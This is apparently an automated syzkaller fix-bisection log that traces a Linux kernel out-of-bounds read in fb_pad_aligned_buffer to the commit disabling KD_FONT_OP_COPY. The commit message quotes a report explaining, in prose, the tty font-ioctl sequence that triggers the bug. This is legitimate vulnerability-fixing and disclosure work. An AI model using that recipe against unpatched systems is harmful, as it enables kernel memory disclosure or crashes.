bisecting fixing commit since fb683b5e3f53a73e761952735736180939a313df building syzkaller on 1508f45368a309a3b1196a342b3d64ce7be4cc43 testing commit fb683b5e3f53a73e761952735736180939a313df with gcc (GCC) 8.1.0 kernel signature: c23962a421ac897760b39febbc24693449746e9d844e1d5ed84ad3eda75780d5 all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer testing current HEAD 0c88e405c97ed1828443b67891e6d4bb6e56cd4e testing commit 0c88e405c97ed1828443b67891e6d4bb6e56cd4e with gcc (GCC) 8.1.0 kernel signature: 7e2c4520a1ee2640296e7cdbdf402436f4ee0a3ac45c7fd2dc2bd24f6e3a7420 all runs: OK # git bisect start 0c88e405c97ed1828443b67891e6d4bb6e56cd4e fb683b5e3f53a73e761952735736180939a313df Bisecting: 3462 revisions left to test after this (roughly 12 steps) [4355296b8d6235d1b3b2bcdd20b4242ce399a878] arm64: Add part number for Neoverse N1 testing commit 4355296b8d6235d1b3b2bcdd20b4242ce399a878 with gcc (GCC) 8.1.0 kernel signature: c7b49ff509dadea0d952b9ef22ac4aaf1a3a83a01fabcce42dc53cc03569aa17 all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer # git bisect good 4355296b8d6235d1b3b2bcdd20b4242ce399a878 Bisecting: 1731 revisions left to test after this (roughly 11 steps) [daa69a213f038f4dafb4feda19db9d135b5ce308] mwifiex: Prevent memory corruption handling keys testing commit daa69a213f038f4dafb4feda19db9d135b5ce308 with gcc (GCC) 8.1.0 kernel signature: 2db902d3bd618b2bcb0ef42042c6e21e2ebc9812c60cf8de9f4cb4c8769c8b4f all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer # git bisect good daa69a213f038f4dafb4feda19db9d135b5ce308 Bisecting: 865 revisions left to test after this (roughly 10 steps) [41f5e62866f0ceb31a825dc91f0440727dbb9495] batman-adv: mcast: fix duplicate mcast packets from BLA backbone to mesh testing commit 41f5e62866f0ceb31a825dc91f0440727dbb9495 with gcc (GCC) 8.1.0 kernel signature: e3b81590040e1e9ecb5f1dc7364e0650b87dd297d6aa01df1ac5ba27cbef2611 all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer # git bisect good 41f5e62866f0ceb31a825dc91f0440727dbb9495 Bisecting: 432 revisions left to test after this (roughly 9 steps) [dea09436da034930fbd63420b3c6a010b98e8fab] xen/events: add a new "late EOI" evtchn framework testing commit dea09436da034930fbd63420b3c6a010b98e8fab with gcc (GCC) 8.1.0 kernel signature: edf6f668f91ab8254c991463300038dc8e1ef87a34b69a4795ba2fbfea8cfbed all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer # git bisect good dea09436da034930fbd63420b3c6a010b98e8fab Bisecting: 216 revisions left to test after this (roughly 8 steps) [83a282f990ba94103eb49be1ad69a8e4b2de4fbd] usb: mtu3: fix panic in mtu3_gadget_stop() testing commit 83a282f990ba94103eb49be1ad69a8e4b2de4fbd with gcc (GCC) 8.1.0 kernel signature: 24160a498344dab1302d3ca78ebeae9416cc3dde3b18f2762a346bde88520745 all runs: OK # git bisect bad 83a282f990ba94103eb49be1ad69a8e4b2de4fbd Bisecting: 107 revisions left to test after this (roughly 7 steps) [9bbfd6578e596d3bf480e74d142e49c88102014d] udf: Fix memory leak when mounting testing commit 9bbfd6578e596d3bf480e74d142e49c88102014d with gcc (GCC) 8.1.0 kernel signature: 301ae4bcf5dd1dde5e5b7a8aadde2c558e7a9d2381cf6f320993af28b01bfc14 all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer # git bisect good 9bbfd6578e596d3bf480e74d142e49c88102014d Bisecting: 53 revisions left to test after this (roughly 6 steps) [64752f5cfda61aa7ca12d23ca1ecc7d36e996f93] sctp: Fix COMM_LOST/CANT_STR_ASSOC err reporting on big-endian platforms testing commit 64752f5cfda61aa7ca12d23ca1ecc7d36e996f93 with gcc (GCC) 8.1.0 kernel signature: a40eb65f89363b716045c99fcc1dac8ace44cc71a75a32a8f15d1675dc921dfd all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer # git bisect good 64752f5cfda61aa7ca12d23ca1ecc7d36e996f93 Bisecting: 26 revisions left to test after this (roughly 5 steps) [1471e96263b6e68929e7afed28f80ab3b6bd1066] lib/crc32test: remove extra local_irq_disable/enable testing commit 1471e96263b6e68929e7afed28f80ab3b6bd1066 with gcc (GCC) 8.1.0 kernel signature: 5364172e87b558a33373eef361944554f48dda69623da19bdf79847727f6f53a all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer # git bisect good 1471e96263b6e68929e7afed28f80ab3b6bd1066 Bisecting: 13 revisions left to test after this (roughly 4 steps) [239aed5d2ecbfd381ca642f0a6bcb272c98408df] blk-cgroup: Pre-allocate tree node on blkg_conf_prep testing commit 239aed5d2ecbfd381ca642f0a6bcb272c98408df with gcc (GCC) 8.1.0 kernel signature: ffe2b33fa2699a987b501caff728cc891211f2673860473b947056c98c69a777 all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer # git bisect good 239aed5d2ecbfd381ca642f0a6bcb272c98408df Bisecting: 6 revisions left to test after this (roughly 3 steps) [18f5757d7fd3ae455c2fcfd60efd5242ea9836f6] serial: 8250_mtk: Fix uart_get_baud_rate warning testing commit 18f5757d7fd3ae455c2fcfd60efd5242ea9836f6 with gcc (GCC) 8.1.0 kernel signature: 066e22f0633a3912d0c092d182d81580de6737c956242e98e7ad80b4c233a7a7 all runs: OK # git bisect bad 18f5757d7fd3ae455c2fcfd60efd5242ea9836f6 Bisecting: 3 revisions left to test after this (roughly 2 steps) [6eecfcbcde431904e5837d285e9e99b5a5eac02c] drm/vc4: drv: Add error handding for bind testing commit 6eecfcbcde431904e5837d285e9e99b5a5eac02c with gcc (GCC) 8.1.0 kernel signature: 77b804fe467a96537ea3a3f82180edaf94ce452553c93f88397d5cf33c70765b all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer # git bisect good 6eecfcbcde431904e5837d285e9e99b5a5eac02c Bisecting: 1 revision left to test after this (roughly 1 step) [6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb] vt: Disable KD_FONT_OP_COPY testing commit 6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb with gcc (GCC) 8.1.0 kernel signature: 011d54d9c8dc4aaaa0551bb7acdd90b2585a0853ffa211e695489e73c7432039 all runs: OK # git bisect bad 6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb Bisecting: 0 revisions left to test after this (roughly 0 steps) [a52cdf61125b2189a8e1d85d1e61d654f7fe5d4d] ACPI: NFIT: Fix comparison to '-ENXIO' testing commit a52cdf61125b2189a8e1d85d1e61d654f7fe5d4d with gcc (GCC) 8.1.0 kernel signature: 705453d979217ed234ecce871a370469b544bcdaecc948a8b9eb361d07688bc8 all runs: crashed: KASAN: global-out-of-bounds Read in fb_pad_aligned_buffer # git bisect good a52cdf61125b2189a8e1d85d1e61d654f7fe5d4d 6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb is the first bad commit commit 6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb Author: Daniel Vetter Date: Sun Nov 8 16:38:06 2020 +0100 vt: Disable KD_FONT_OP_COPY commit 3c4e0dff2095c579b142d5a0693257f1c58b4804 upstream. It's buggy: On Fri, Nov 06, 2020 at 10:30:08PM +0800, Minh Yuan wrote: > We recently discovered a slab-out-of-bounds read in fbcon in the latest > kernel ( v5.10-rc2 for now ). The root cause of this vulnerability is that > "fbcon_do_set_font" did not handle "vc->vc_font.data" and > "vc->vc_font.height" correctly, and the patch > for VT_RESIZEX can't handle this > issue. > > Specifically, we use KD_FONT_OP_SET to set a small font.data for tty6, and > use KD_FONT_OP_SET again to set a large font.height for tty1. After that, > we use KD_FONT_OP_COPY to assign tty6's vc_font.data to tty1's vc_font.data > in "fbcon_do_set_font", while tty1 retains the original larger > height. Obviously, this will cause an out-of-bounds read, because we can > access a smaller vc_font.data with a larger vc_font.height. Further there was only one user ever. - Android's loadfont, busybox and console-tools only ever use OP_GET and OP_SET - fbset documentation only mentions the kernel cmdline font: option, not anything else. - systemd used OP_COPY before release 232 published in Nov 2016 Now unfortunately the crucial report seems to have gone down with gmane, and the commit message doesn't say much. But the pull request hints at OP_COPY being broken https://github.com/systemd/systemd/pull/3651 So in other words, this never worked, and the only project which foolishly every tried to use it, realized that rather quickly too. Instead of trying to fix security issues here on dead code by adding missing checks, fix the entire thing by removing the functionality. Note that systemd code using the OP_COPY function ignored the return value, so it doesn't matter what we're doing here really - just in case a lone server somewhere happens to be extremely unlucky and running an affected old version of systemd. The relevant code from font_copy_to_all_vcs() in systemd was: /* copy font from active VT, where the font was uploaded to */ cfo.op = KD_FONT_OP_COPY; cfo.height = vcs.v_active-1; /* tty1 == index 0 */ (void) ioctl(vcfd, KDFONTOP, &cfo); Note this just disables the ioctl, garbage collecting the now unused callbacks is left for -next. v2: Tetsuo found the old mail, which allowed me to find it on another archive. Add the link too. Acked-by: Peilin Ye Reported-by: Minh Yuan References: https://lists.freedesktop.org/archives/systemd-devel/2016-June/036935.html References: https://github.com/systemd/systemd/pull/3651 Cc: Greg KH Cc: Peilin Ye Cc: Tetsuo Handa Signed-off-by: Daniel Vetter Link: https://lore.kernel.org/r/20201108153806.3140315-1-daniel.vetter@ffwll.ch Signed-off-by: Greg Kroah-Hartman drivers/tty/vt/vt.c | 24 ++---------------------- 1 file changed, 2 insertions(+), 22 deletions(-) culprit signature: 011d54d9c8dc4aaaa0551bb7acdd90b2585a0853ffa211e695489e73c7432039 parent signature: 705453d979217ed234ecce871a370469b544bcdaecc948a8b9eb361d07688bc8 revisions tested: 15, total time: 3h43m19.230959391s (build: 2h33m9.189875505s, test: 1h8m24.366941218s) first good commit: 6612b754ac0c85ca8b1181b5d3ea4461a8c1bbcb vt: Disable KD_FONT_OP_COPY recipients (to): ["daniel.vetter@ffwll.ch" "daniel.vetter@intel.com" "gregkh@linuxfoundation.org" "yepeilin.cs@gmail.com"] recipients (cc): []